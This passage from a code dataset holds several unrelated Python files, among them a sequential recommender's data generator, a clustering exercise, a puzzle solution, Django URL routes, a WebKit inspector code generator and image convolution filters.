aprec.recommenders.sequential.sequential_recommender_config import SequentialRecommenderConfig\nfrom multiprocessing_on_dill.context import ForkProcess, ForkContext\nfrom aprec.recommenders.sequential.target_builders.target_builders import TargetBuilder\nfrom aprec.utils.os_utils import shell\n\nclass DataGenerator(Sequence):\n def __init__(self, config:SequentialRecommenderConfig, user_actions,\n n_items, targets_builder: TargetBuilder, shuffle_data = True):\n self.config = config\n self.user_actions = user_actions\n self.sequence_lenghth = config.sequence_length\n self.n_items = n_items\n self.sequences_matrix = None\n self.sequence_splitter = config.sequence_splitter()\n self.sequence_splitter.set_num_items(n_items)\n self.sequence_splitter.set_sequence_len(config.sequence_length)\n self.sequence_splitter.set_actions(user_actions)\n self.targets_builder = targets_builder\n self.targets_builder.set_sequence_len(config.sequence_length)\n self.do_shuffle_data = shuffle_data\n self.reset()\n\n\n def reset(self):\n if self.do_shuffle_data: \n self.shuffle_data()\n history, target = self.split_actions(self.user_actions)\n self.sequences_matrix = self.matrix_for_embedding(history)\n self.targets_builder.set_n_items(self.n_items)\n self.targets_builder.build(target)\n self.current_position = 0\n self.max = self.__len__()\n \n def reset_iterator(self):\n self.current_position = 0\n\n def shuffle_data(self):\n random.shuffle(self.user_actions)\n\n @staticmethod\n def get_features_matrix(user_features, max_user_features):\n result = []\n for features in user_features:\n result.append([0] * (max_user_features - len(features)) + features)\n return np.array(result)\n\n\n def matrix_for_embedding(self, user_actions):\n result = []\n for actions in user_actions:\n result.append(self.config.train_history_vectorizer(actions))\n return np.array(result)\n\n def build_target_matrix(self, user_targets):\n if self.config.sampled_target is None:\n self.build_full_target_matrix(user_targets)\n else:\n self.build_sampled_targets(user_targets)\n\n def split_actions(self, user_actions):\n history = []\n target = []\n if self.config.max_batches_per_epoch is not None:\n max_users = self.config.max_batches_per_epoch * self.config.batch_size\n else:\n max_users = len(user_actions)\n for user in user_actions[:max_users]:\n user_history, user_target = self.sequence_splitter.split(user)\n history.append(user_history)\n target.append(user_target)\n return history, target\n\n def __len__(self):\n return self.sequences_matrix.shape[0] // self.config.batch_size\n\n def __getitem__(self, idx):\n start = idx * self.config.batch_size\n end = (idx + 1) * self.config.batch_size\n history = self.sequences_matrix[start:end]\n model_inputs = [history]\n target_inputs, target = self.targets_builder.get_targets(start, end)\n model_inputs += target_inputs\n\n return model_inputs, target \n\n def __next__(self):\n if self.current_position >= self.max:\n raise StopIteration()\n result = self.__getitem__(self.current_position)\n self.current_position += 1\n return result\n\n\ndef reverse_positions(session_len, history_size):\n if session_len >= history_size:\n return list(range(history_size, 0, -1))\n else:\n return [0] * (history_size - session_len) + list(range(session_len, 0, -1))\n\nclass MemmapDataGenerator(Sequence):\n @staticmethod\n def flush(arr, fname):\n arr = np.array(arr)\n shape = arr.shape\n dtype = arr.dtype\n res = np.memmap(fname, shape=shape, dtype=dtype, mode=\"write\")\n res[:] = arr[:]\n res.flush()\n res._mmap.close()\n del(res)\n return fname, shape, dtype\n \n @staticmethod\n def recover(fname, shape, dtype):\n res = np.memmap(fname, shape=shape, dtype=dtype, mode=\"readonly\")\n return res\n\n def __init__(self, data_generator, dir):\n self.tempdir = tempfile.mkdtemp(prefix=\"sequential_train_\", dir=dir)\n self.inputs = []\n self.targets = []\n for i in range(len(data_generator)):\n inputs, target = data_generator[i]\n target_name = os.path.join(self.tempdir, f\"batch_{i}.target\")\n self.targets.append(self.flush(target, target_name))\n mmaped_inputs = []\n for n_input in range(len(inputs)):\n input_name= os.path.join(self.tempdir, f\"batch_{i}_input_{n_input}.input\")\n mmaped_inputs.append(self.flush(inputs[n_input], input_name))\n self.inputs.append(mmaped_inputs)\n pass\n self.current_position = 0\n self.max = self.__len__()\n self.memmaped_objects = {}\n\n def __next__(self):\n if self.current_position >= self.max:\n raise StopIteration()\n result = self.__getitem__(self.current_position)\n self.current_position += 1\n return result\n\n def __len__(self):\n return len(self.targets)\n \n def __getitem__(self, idx):\n if idx not in self.memmaped_objects:\n inputs = []\n for input in self.inputs[idx]:\n inputs.append(self.recover(*input))\n targets = self.recover(*self.targets[idx])\n self.memmaped_objects[idx] = inputs, targets\n return self.memmaped_objects[idx]\n\n def reset(self):\n self.current_position = 0\n self.max = self.__len__()\n\n def cleanup(self):\n for idx in list(self.memmaped_objects.keys()):\n inputs, targets = self.memmaped_objects[idx] \n targets._mmap.close()\n for input in inputs:\n input._mmap.close()\n del(self.memmaped_objects[idx])\n cmd = f\"rm -rf {self.tempdir}\"\n shell(cmd)\n\n \nclass DataGeneratorFactory(object):\n def __init__(self, queue, tempdir, config, *args, **kwargs):\n self.tempdir = tempdir\n self.factory_func = lambda: MemmapDataGenerator(DataGenerator(config, *args, **kwargs), tempdir)\n self.queue = queue\n self.last_generator:MemmapDataGenerator = None\n\n def __call__(self):\n while True:\n self.last_generator = self.factory_func()\n self.queue.put(self.last_generator)\n\n\nclass DataGeneratorAsyncFactory(object):\n def __init__(self, config: SequentialRecommenderConfig, *args, **kwargs) -> None:\n self.tempdir = tempfile.mkdtemp(prefix = \"sequential_recommender_async_factory_\")\n self.config = config\n ctx = ForkContext()\n self.result_queue = ctx.Queue(self.config.data_generator_queue_size)\n self.generator_factory = DataGeneratorFactory(self.result_queue, self.tempdir, config, *args, **kwargs)\n\n def __enter__(self):\n self.processors:List[ForkProcess] = []\n for i in range(self.config.data_generator_processes):\n self.processors.append(ForkProcess(target=self.generator_factory))\n self.processors[-1].daemon = True \n self.processors[-1].start()\n return self\n\n def next_generator(self) -> MemmapDataGenerator:\n return self.result_queue.get()\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n for p in self.processors:\n p.terminate()\n p.join()\n cmd = f\"rm -rf {self.tempdir}\"\n shell(cmd)\n\n","repo_name":"asash/gsasrec","sub_path":"recommenders/sequential/data_generator/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":7794,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"23962335032","text":"# 1) მომხმარებელს კითხეთ თავისი და მამამისის ასაკი, \n# დაუპრინტეთ ყოველ წელს რამდენჯერ უფროსი იქნება მამამისი მასზე.\n\nson_age = int(input(\"enter son age: \"))\ndad_age = int(input(\"enter dad age: \"))\ncurrent_year = int(input(\"enter current year: \"))\nsum_age = dad_age - son_age\n\nfor i in range(10):\n print(\"mamachemi am wels \" + str(current_year + i) + \" iqneba \" + str(sum_age) + \"-it ufrosi chemze\")\n\n# 2) 0 იდან 30-ის ფარგლებში დაპრინტეთ ყველა ლუწი და კენტი რიცხვი, მიუწერეთ გვერდზე \n# კენტია თუ ლუწი\n\ni = 1\nwhile i < 30:\n print(i, \"odd\")\n print(i+1, \"even\")\n i += 2\n\n\n\n","repo_name":"beridzezura14/Module-1","sub_path":"Day 5/homework/homework-5.py","file_name":"homework-5.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15025829542","text":"'''\nClustering the fish data\n\nYou'll now use your standardization and clustering pipeline from the previous \nexercise to cluster the fish by their measurements, and then create a \ncross-tabulation to compare the cluster labels with the fish species.\n\nAs before, samples is the 2D array of fish measurements. Your pipeline is \navailable as pipeline, and the species of every fish sample is given by the \nlist species.\n\nINSTRUCTIONS\n100XP\nImport pandas as pd.\nFit the pipeline to the fish measurements samples.\nObtain the cluster labels for samples by using the .predict() method of pipeline.\nUsing pd.DataFrame(), create a DataFrame df with two columns named 'labels' \nand 'species', using labels and species, respectively, for the column values.\nUsing pd.crosstab(), create a cross-tabulation ct of df['labels'] and \ndf['species'].\n'''\n#Done by DataCamp\n# Perform the necessary imports\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import KMeans\nimport pandas as pd\n\n# Create scaler: scaler\nscaler = StandardScaler()\n\n# Create KMeans instance: kmeans\nkmeans = KMeans(n_clusters=4, random_state=42)\n\n# Create pipeline: pipeline\npipeline = make_pipeline(scaler, kmeans)\n\nsamples = pd.read_csv('E:/DataCamp/Unsupervised-learning-in-python/data/fish.csv',\n header=None)\n\nspecies = samples[0].tolist()\n\nsamples = samples.drop(samples.columns[0], axis = 1)\n\nsamples = samples.values\n\n#End done by DataCamp\n\n# Fit the pipeline to samples\npipeline.fit(samples)\n\n# Calculate the cluster labels: labels\nlabels = pipeline.predict(samples)\n\n# Create a DataFrame with labels and species as columns: df\ndf = pd.DataFrame({'labels': labels, 'species': species})\n\n# Create crosstab: ct\nct = pd.crosstab(df['labels'], df['species'])\n\n# Display ct\nprint(ct)","repo_name":"GrinningGeek/DataCamp_Notes","sub_path":"Unsupervised-learning-in-python/01-clustering-for-dataset-exploration/07-clustering-the-fish-data.py","file_name":"07-clustering-the-fish-data.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4274730678","text":"import collections\nimport copy\nimport math\nimport regex\n\nfrom functools import reduce\nfrom itertools import product\n\n\ndef main():\n\tinput = []\n\n\twith open(\"input.txt\") as f:\n\t\tfor line in f:\n\t\t\tif line.strip() == \"\":\n\t\t\t\tcontinue\n\n\t\t\tmatch = regex.match(r\"((\\w+)\\W*)* \\(contains ((\\w+)\\W*)*\\)\", line)\n\t\t\tinput.append((match.captures(2), match.captures(4)))\n\n\tall_ingredients = [x for sublist in input for x in sublist[0]]\n\tallergen_map = {x: [] for x in set(all_ingredients)}\n\tallergens = {x for sublist in input for x in sublist[1]}\n\n\tfor allergen in allergens:\n\t\tingredients = [set(x[0]) for x in input if allergen in x[1]]\n\t\tcommon_ingredients = ingredients.pop().intersection(*ingredients)\n\t\tfor i in common_ingredients:\n\t\t\tallergen_map[i].append(allergen)\n\n\tsafe_ingredients = [a for a, v in allergen_map.items() if len(v) == 0]\n\tprint(sum([all_ingredients.count(x) for x in safe_ingredients]))\n\n\treduced_allergen_map = {ing: allergens for ing, allergens in allergen_map.items() if len(allergens) > 0}\n\tdefinitive_allergen_map = {ing: None for ing in reduced_allergen_map.keys()}\n\n\twhile None in definitive_allergen_map.values():\n\t\tto_reduce = {ing: allergens for ing, allergens in reduced_allergen_map.items() if len(allergens) == 1}\n\t\tfor ing, allergens in to_reduce.items():\n\t\t\tdefinitive_allergen_map[ing] = allergens[0]\n\t\t\tdel reduced_allergen_map[ing]\n\n\t\t\tfor r_ing, r_allergens in reduced_allergen_map.items():\n\t\t\t\tif allergens[0] in r_allergens:\n\t\t\t\t\tr_allergens.remove(allergens[0])\n\n\tia_pairs = [(k, v) for k, v in definitive_allergen_map.items()]\n\tprint(\",\".join([y[0] for y in sorted(ia_pairs, key=lambda x: x[1])]))\n\n\nmain()\n","repo_name":"waiwaing/advent-of-code-2020","sub_path":"21/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20358827172","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nimport app.views as landing_views\n\nurlpatterns = [\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^app/', include('frontend.urls')),\n url(r'^accounts/', include('allauth.urls')),\n url(r'^api/', include('app.api')),\n url(r'^$', landing_views.index),\n]\n","repo_name":"thefedoration/tracker-widgets","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11207662296","text":"import logging\nimport string\nfrom string import Template\n\ntry:\n from .cpp_generator import CppGenerator\n from .cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n from .generator import Generator, ucfirst\n from .models import ObjectType, ArrayType, AliasedType, EnumType\nexcept ImportError:\n from cpp_generator import CppGenerator\n from cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n from generator import Generator, ucfirst\n from models import ObjectType, ArrayType, AliasedType, EnumType\n\nlog = logging.getLogger('global')\n\n\nclass CppBackendDispatcherImplementationGenerator(CppGenerator):\n def __init__(self, *args, **kwargs):\n CppGenerator.__init__(self, *args, **kwargs)\n\n def output_filename(self):\n return \"%sBackendDispatchers.cpp\" % self.protocol_name()\n\n def domains_to_generate(self):\n return [domain for domain in Generator.domains_to_generate(self) if len(self.commands_for_domain(domain)) > 0]\n\n def generate_output(self):\n secondary_includes = self._generate_secondary_header_includes()\n\n if self.model().framework.setting('alternate_dispatchers', False):\n secondary_includes.append('')\n secondary_includes.append('#if ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n secondary_includes.append('#include \"%sAlternateBackendDispatchers.h\"' % self.protocol_name())\n secondary_includes.append('#endif // ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n\n header_args = {\n 'primaryInclude': '\"%sBackendDispatchers.h\"' % self.protocol_name(),\n 'secondaryIncludes': '\\n'.join(secondary_includes),\n }\n\n sections = []\n sections.append(self.generate_license())\n sections.append(Template(CppTemplates.ImplementationPrelude).substitute(None, **header_args))\n sections.append(\"\\n\".join(map(self._generate_handler_class_destructor_for_domain, self.domains_to_generate())))\n sections.extend(list(map(self._generate_dispatcher_implementations_for_domain, self.domains_to_generate())))\n sections.append(Template(CppTemplates.ImplementationPostlude).substitute(None, **header_args))\n return \"\\n\\n\".join(sections)\n\n # Private methods.\n\n def _generate_secondary_header_includes(self):\n header_includes = [\n ([\"JavaScriptCore\", \"WebKit\"], (\"JavaScriptCore\", \"inspector/InspectorFrontendRouter.h\")),\n ([\"JavaScriptCore\", \"WebKit\"], (\"WTF\", \"wtf/NeverDestroyed.h\")),\n ]\n return self.generate_includes_from_entries(header_includes)\n\n\n def _generate_handler_class_destructor_for_domain(self, domain):\n destructor_args = {\n 'domainName': domain.domain_name\n }\n destructor = '%(domainName)sBackendDispatcherHandler::~%(domainName)sBackendDispatcherHandler() { }' % destructor_args\n return self.wrap_with_guard_for_condition(domain.condition, destructor)\n\n def _generate_dispatcher_implementations_for_domain(self, domain):\n implementations = []\n\n constructor_args = {\n 'domainName': domain.domain_name,\n }\n implementations.append(Template(CppTemplates.BackendDispatcherImplementationDomainConstructor).substitute(None, **constructor_args))\n\n commands = self.commands_for_domain(domain)\n\n if len(commands) <= 5:\n implementations.append(self._generate_small_dispatcher_switch_implementation_for_domain(domain))\n else:\n implementations.append(self._generate_large_dispatcher_switch_implementation_for_domain(domain))\n\n for command in commands:\n if command.is_async:\n implementations.append(self._generate_async_dispatcher_class_for_domain(command, domain))\n implementations.append(self._generate_dispatcher_implementation_for_command(command, domain))\n\n return self.wrap_with_guard_for_condition(domain.condition, '\\n\\n'.join(implementations))\n\n def _generate_small_dispatcher_switch_implementation_for_domain(self, domain):\n commands = self.commands_for_domain(domain)\n\n cases = []\n\n first_command_string = \"\\n\".join([\n ' if (protocol_method == \"%s\"_s) {' % commands[0].command_name,\n ' %s(protocol_requestId, WTFMove(protocol_parameters));' % commands[0].command_name,\n ' return;',\n ' }',\n ])\n cases.append(self.wrap_with_guard_for_condition(commands[0].condition, first_command_string))\n\n for command in commands[1:]:\n additional_command_string = \"\\n\".join([\n ' if (protocol_method == \"%s\"_s) {' % command.command_name,\n ' %s(protocol_requestId, WTFMove(protocol_parameters));' % command.command_name,\n ' return;',\n ' }',\n ])\n cases.append(self.wrap_with_guard_for_condition(command.condition, additional_command_string))\n\n switch_args = {\n 'domainName': domain.domain_name,\n 'dispatchCases': \"\\n\".join(cases)\n }\n\n return Template(CppTemplates.BackendDispatcherImplementationSmallSwitch).substitute(None, **switch_args)\n\n def _generate_large_dispatcher_switch_implementation_for_domain(self, domain):\n commands = self.commands_for_domain(domain)\n\n cases = []\n for command in commands:\n args = {\n 'domainName': domain.domain_name,\n 'commandName': command.command_name\n }\n cases.append(self.wrap_with_guard_for_condition(command.condition, ' { \"%(commandName)s\"_s, &%(domainName)sBackendDispatcher::%(commandName)s },' % args))\n\n switch_args = {\n 'domainName': domain.domain_name,\n 'dispatchCases': \"\\n\".join(cases)\n }\n\n return Template(CppTemplates.BackendDispatcherImplementationLargeSwitch).substitute(None, **switch_args)\n\n def _generate_async_dispatcher_class_for_domain(self, command, domain):\n return_assignments = []\n callback_parameters = []\n\n for parameter in command.return_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n\n parameter_value = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n if parameter.is_optional:\n parameter_value = '*' + parameter_value\n parameter_value = 'Protocol::%s::getEnumConstantValue(%s)' % (self.helpers_namespace(), parameter_value)\n elif CppGenerator.should_release_argument(_type, parameter.is_optional):\n parameter_value = parameter_value + '.releaseNonNull()'\n elif CppGenerator.should_dereference_argument(_type, parameter.is_optional):\n parameter_value = '*' + parameter_value\n elif CppGenerator.should_move_argument(_type, parameter.is_optional):\n parameter_value = 'WTFMove(%s)' % parameter_value\n\n param_args = {\n 'keyedSetMethod': CppGenerator.cpp_setter_method_for_type(_type),\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'parameterValue': parameter_value,\n }\n\n callback_parameters.append('%s %s' % (CppGenerator.cpp_type_for_command_return_argument(_type, parameter.is_optional), parameter_name))\n\n if parameter.is_optional:\n return_assignments.append(' if (!!%(parameterName)s)' % param_args)\n return_assignments.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n else:\n return_assignments.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n\n async_args = {\n 'domainName': domain.domain_name,\n 'callbackName': ucfirst(command.command_name) + 'Callback',\n 'callbackParameters': \", \".join(callback_parameters),\n 'returnAssignments': \"\\n\".join(return_assignments)\n }\n return self.wrap_with_guard_for_condition(command.condition, Template(CppTemplates.BackendDispatcherImplementationAsyncCommand).substitute(None, **async_args))\n\n def _generate_dispatcher_implementation_for_command(self, command, domain):\n parameter_declarations = []\n parameter_enum_resolutions = []\n alternate_dispatcher_method_parameters = ['protocol_requestId']\n method_parameters = []\n\n for parameter in command.call_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n parameter_name = 'in_' + parameter_name\n\n variable_name = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n parameter_name = parameter_name + '_json'\n\n alternate_dispatcher_method_parameters.append(parameter_name)\n\n enum_args = {\n 'helpersNamespace': self.helpers_namespace(),\n 'parameterKey': parameter.parameter_name,\n 'enumType': CppGenerator.cpp_protocol_type_for_type(_type),\n 'enumVariableName': variable_name,\n 'stringVariableName': parameter_name,\n }\n\n if len(parameter_enum_resolutions):\n parameter_enum_resolutions.append('')\n parameter_enum_resolutions.append(' auto %(enumVariableName)s = Protocol::%(helpersNamespace)s::parseEnumValueFromString<%(enumType)s>(%(stringVariableName)s);' % enum_args)\n if parameter.is_optional:\n parameter_expression = 'WTFMove(%s)' % variable_name\n else:\n parameter_enum_resolutions.append(' if (!%(enumVariableName)s) {' % enum_args)\n parameter_enum_resolutions.append(' m_backendDispatcher->reportProtocolError(BackendDispatcher::ServerError, makeString(\"Unknown %(parameterKey)s: \"_s, %(stringVariableName)s));' % enum_args)\n parameter_enum_resolutions.append(' return;')\n parameter_enum_resolutions.append(' }')\n parameter_expression = '*' + variable_name\n else:\n if _type.raw_name() == 'string':\n parameter_expression = variable_name\n elif parameter.is_optional:\n parameter_expression = 'WTFMove(%s)' % variable_name\n elif _type.raw_name() in ['boolean', 'integer', 'number']:\n parameter_expression = '*' + variable_name\n else:\n parameter_expression = variable_name + '.releaseNonNull()'\n alternate_dispatcher_method_parameters.append(parameter_expression)\n method_parameters.append(parameter_expression)\n\n param_args = {\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'keyedGetMethod': CppGenerator.cpp_getter_method_for_type(_type),\n 'required': 'false' if parameter.is_optional else 'true',\n }\n parameter_declarations.append(' auto %(parameterName)s = m_backendDispatcher->%(keyedGetMethod)s(protocol_parameters.get(), \"%(parameterKey)s\"_s, %(required)s);' % param_args)\n\n if command.is_async:\n method_parameters.append('adoptRef(*new %sBackendDispatcherHandler::%s(m_backendDispatcher.copyRef(), protocol_requestId))' % (domain.domain_name, '%sCallback' % ucfirst(command.command_name)))\n\n command_args = {\n 'domainName': domain.domain_name,\n 'commandName': command.command_name,\n 'parameterDeclarations': '\\n'.join(parameter_declarations),\n 'invocationParameters': ', '.join(method_parameters),\n 'alternateInvocationParameters': ', '.join(alternate_dispatcher_method_parameters),\n }\n\n lines = []\n if len(command.call_parameters) == 0:\n lines.append('void %(domainName)sBackendDispatcher::%(commandName)s(long protocol_requestId, RefPtr<JSON::Object>&&)' % command_args)\n else:\n lines.append('void %(domainName)sBackendDispatcher::%(commandName)s(long protocol_requestId, RefPtr<JSON::Object>&& protocol_parameters)' % command_args)\n lines.append('{')\n\n if len(command.call_parameters) > 0:\n lines.append(Template(CppTemplates.BackendDispatcherImplementationPrepareCommandArguments).substitute(None, **command_args))\n\n if self.model().framework.setting('alternate_dispatchers', False):\n lines.append('#if ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n lines.append(' if (m_alternateDispatcher) {')\n lines.append(' m_alternateDispatcher->%(commandName)s(%(alternateInvocationParameters)s);' % command_args)\n lines.append(' return;')\n lines.append(' }')\n lines.append('#endif // ENABLE(INSPECTOR_ALTERNATE_DISPATCHERS)')\n lines.append('')\n\n if len(parameter_enum_resolutions):\n lines.extend(parameter_enum_resolutions)\n lines.append('')\n\n if command.is_async:\n lines.append(' m_agent->%(commandName)s(%(invocationParameters)s);' % command_args)\n else:\n result_destructured_names = []\n result_conversion_lines = []\n for parameter in command.return_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n parameter_name = 'out_' + parameter_name\n\n result_destructured_names.append(parameter_name)\n\n parameter_value = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n if parameter.is_optional:\n parameter_value = '*' + parameter_value\n parameter_value = 'Protocol::%s::getEnumConstantValue(%s)' % (self.helpers_namespace(), parameter_value)\n elif CppGenerator.should_release_argument(_type, parameter.is_optional):\n parameter_value = parameter_value + '.releaseNonNull()'\n elif CppGenerator.should_dereference_argument(_type, parameter.is_optional):\n parameter_value = '*' + parameter_value\n elif CppGenerator.should_move_argument(_type, parameter.is_optional):\n parameter_value = 'WTFMove(%s)' % parameter_value\n\n param_args = {\n 'keyedSetMethod': CppGenerator.cpp_setter_method_for_type(_type),\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'parameterValue': parameter_value,\n }\n\n if parameter.is_optional:\n result_conversion_lines.append(' if (!!%(parameterName)s)' % param_args)\n result_conversion_lines.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n else:\n result_conversion_lines.append(' protocol_jsonMessage->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % param_args)\n\n lines.append(' auto result = m_agent->%(commandName)s(%(invocationParameters)s);' % command_args)\n lines.append(' if (!result) {')\n lines.append(' ASSERT(!result.error().isEmpty());')\n lines.append(' m_backendDispatcher->reportProtocolError(BackendDispatcher::ServerError, result.error());')\n lines.append(' return;')\n lines.append(' }')\n lines.append('')\n if len(result_destructured_names) == 1:\n lines.append(' auto %s = WTFMove(result.value());' % result_destructured_names[0])\n lines.append('')\n elif len(result_destructured_names) > 1:\n lines.append(' auto [%s] = WTFMove(result.value());' % \", \".join(result_destructured_names))\n lines.append('')\n lines.append(' auto protocol_jsonMessage = JSON::Object::create();')\n lines.extend(result_conversion_lines)\n lines.append(' m_backendDispatcher->sendResponse(protocol_requestId, WTFMove(protocol_jsonMessage), false);')\n\n lines.append('}')\n return self.wrap_with_guard_for_condition(command.condition, \"\\n\".join(lines))\n","repo_name":"WebKit/WebKit","sub_path":"Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_backend_dispatcher_implementation.py","file_name":"generate_cpp_backend_dispatcher_implementation.py","file_ext":"py","file_size_in_byte":17512,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"24818847096","text":"import numpy as np\nimport matplotlib.image as image\nimport matplotlib.pyplot as plt\n\n\n# Convolution operation using the fixed array shown in the Fig. 1 as the input and the filter\ndef convolution_fixed():\n np.set_printoptions(linewidth=9)\n img = np.array([[[0], [2], [1]], [[3], [4], [2]], [[1], [0], [3]]])\n print(\"The input array is:\\n\", img)\n kernel = np.array([[[1], [2]], [[2], [1]]])\n print(\"The kernel array is:\\n\", kernel)\n img_conv = np.zeros((2, 2, 1))\n for i in range(2):\n for j in range(2):\n input = img[i:i + len(kernel), j:j + len(kernel)]\n img_conv[i][j] = np.sum(np.multiply(input, kernel))\n print(\"The output array is:\\n\", img_conv)\n\n\ndef grayscale(img):\n R, G, B = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n imgGray = 0.2989 * R + 0.5870 * G + 0.1140 * B\n plt.imshow(imgGray, cmap='gray')\n pltTitle = 'Grayscale images of Dog image'\n plt.title(pltTitle)\n plt.show()\n # print('grayscale image: ', imgGray)\n return imgGray\n\n\n# Normalization function for grayscale arrays\ndef normalized_grayscale(array):\n norm = (array - np.min(array)) / (np.max(array) - np.min(array))\n # array = array * norm * 255\n return array * norm * 255\n\n\n# General convolution operation function with grayscale map and convolution kernel as input\ndef convolution_operation(imgGray, conv_filter):\n height, width = imgGray.shape\n size = len(conv_filter)\n # create a new numpy array with padding to make sure the filtered image has the same size as the input image\n # It must be noted, however, that filters of odd size will facilitate the calculation\n # img_padding = np.zeros((height + size - 1, width + size - 1))\n # img_padding[((size - 1) // 2):((size - 1) // 2 + height), ((size - 1) // 2):((size - 1) // 2 + width)] = imgGray\n img_conv = []\n for i in range(height - size + 1):\n row = []\n for j in range(width - size + 1):\n input = imgGray[i:i + len(conv_filter), j:j + len(conv_filter)]\n row.append(np.sum(np.multiply(input, conv_filter)))\n img_conv.append(row)\n return np.array(img_conv)\n\n\n# The function take in the kernel size, mean, and variance as inputs to create a gaussian filter\ndef gaussian_kernel(kernel_size, mean, variance):\n kernel = np.zeros((kernel_size, kernel_size))\n for i in range(kernel_size):\n for j in range(kernel_size):\n x, y = i - mean[0], j - mean[1]\n # gaussian kernel function\n kernel[i, j] = np.exp(-(x ** 2 + y ** 2) / (2 * variance)) / (2 * np.pi * variance)\n # kernel = normalized_grayscale(kernel)\n print('Gaussian Kernel of size', kernel_size, \"x\", kernel_size, \", mean\", mean, \", variance\", variance)\n return kernel\n\n\n# The formula of Laplace Gaussian operator\ndef laplacian_of_gaussian(x, y, sigma):\n # Formatted this way for readability\n nom = (y ** 2) + (x ** 2) - 2 * (sigma ** 2)\n denom = 2 * np.pi * (sigma ** 6)\n expo = np.exp(-((x ** 2) + (y ** 2)) / (2 * (sigma ** 2)))\n return (nom * expo / denom)\n\n\n# Generate Laplace Gaussian filter with sigma and size as input\ndef create_log(sigma, kernel_size):\n w = (np.ceil(float(kernel_size) * float(sigma)))\n if w % 2 == 0:\n w = w + 1\n l_o_g_mask = []\n w_range = int(np.floor(w / 2))\n for i in range(-w_range, w_range + 1):\n for j in range(-w_range, w_range + 1):\n l_o_g_mask.append(laplacian_of_gaussian(i, j, sigma))\n l_o_g_mask = np.array(l_o_g_mask)\n l_o_g_mask = l_o_g_mask.reshape(int(w), int(w))\n return l_o_g_mask\n\n\n# Convolution operation based on Laplace Gaussian filter\ndef laplacian_convolution(imgGray, kernel_size, sigma):\n log_mask = create_log(sigma, kernel_size)\n img_log = convolution_operation(imgGray, log_mask)\n norm = (img_log - np.min(img_log)) / (np.max(img_log) - np.min(img_log))\n img_log = img_log * norm * 255\n return img_log\n\n\nconvolution_fixed()\nimg = image.imread('dog.jpg')\nimgGray = grayscale(img)\n# generation of a gaussian filer with 200*200 size, [80, 100] mean and 50 variance\ngaussian_filter = gaussian_kernel(200, [80, 100], 50)\nplt.imshow(gaussian_filter, cmap='gray')\nplt.title('Gaussian Kernel')\nplt.show()\n# Gaussian filter based convolution operation\nimg_conv_gaussian = convolution_operation(imgGray, gaussian_kernel(7, [4, 3], 30))\nplt.imshow(img_conv_gaussian, cmap=\"gray\")\nplt.title('Blurred image with Gaussian convolution')\nplt.show()\n# Laplace Gaussian filter based convolution operation\nimg_laplacian = laplacian_convolution(imgGray, 7, 1)\nplt.imshow(img_laplacian, cmap=\"gray\")\nplt.title('Laplace operation')\nplt.show()\n","repo_name":"Wenfeng-Zhu/CV-DL-Visual-Synthesis","sub_path":"exercise-1/exercise-1-task-2.py","file_name":"exercise-1-task-2.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31771015072","text":"from difflib import SequenceMatcher\ndef scour(find, tlist):\n x = 0\n def ke(z):\n return SequenceMatcher(None, z, find).ratio() * -1\n try:\n while tlist[x]:\n SequenceMatcher(None, tlist[x], find).ratio()\n #print comp[x] + \" compared to \" + find;\n x = x + 1\n except IndexError:\n tlist.sort(key=ke)\n return 